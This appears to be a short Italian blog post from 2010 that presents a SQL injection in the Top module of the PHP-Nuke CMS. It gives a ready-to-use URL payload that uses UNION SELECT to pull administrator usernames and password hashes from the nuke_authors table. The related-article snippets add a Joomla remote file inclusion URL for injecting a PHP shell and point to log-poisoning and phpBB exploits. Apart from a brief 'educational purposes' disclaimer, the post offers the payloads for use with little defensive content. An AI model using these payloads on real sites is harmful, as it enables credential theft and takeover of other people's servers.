10 marzo 2010 | 
Autore: 
Tutti ormai conoscono PHP Nuke,il famoso CMS (content manager system ovvero sistema di gestione dei contenuti) e come ogni CMS che si rispetti (ormai è difficile trovare CMS senza vulnerabilità 
) ha qualche falla 
Quella che vi presento oggi è una falla nel modulo Top.Di seguito trovate il codice 
/modules.php?name=Top&querylang=%20WHERE%201=1%20UNION+ ALL%20SELECT%200,pwd,aid,0%20FROM%20nuke_authors–
Funziona su molte versioni di PHP Nuke.Ovviamente è tutto a scopo informativo e didattico 
Michele
Condividere è sexy
Ti potrebbero interessare anche i seguenti articoli
- Fix Nuke Sentinel SQJ Injection ll sentinel non blocca delle sql injection scritte in un certo modo… Per fixarlo: Aprire...
- Log poisoning e shell injection Video tutorial che illustra come iniettare una shell PHP su un server web avente uno...
- 0day Joomla: Shell Injection http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL} XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path= Permette di iniettare una shell in PHP nel sito web dandovi pieno...
- PHPBB Sentinel Utile script in PHP che protegge il vostro forum in phpbb dai seguenti attacchi: XSS...
- Phpbb 3.0 sql injection exploit Vulnerabilità della versione 3.0 della bulletin board phpBB. Clicca quì per il codice dell'exploit. Mi...
Pubblicato in 
Tag: 
roba vecchia… ma perchè postate ste scemenze di 10 anni fa?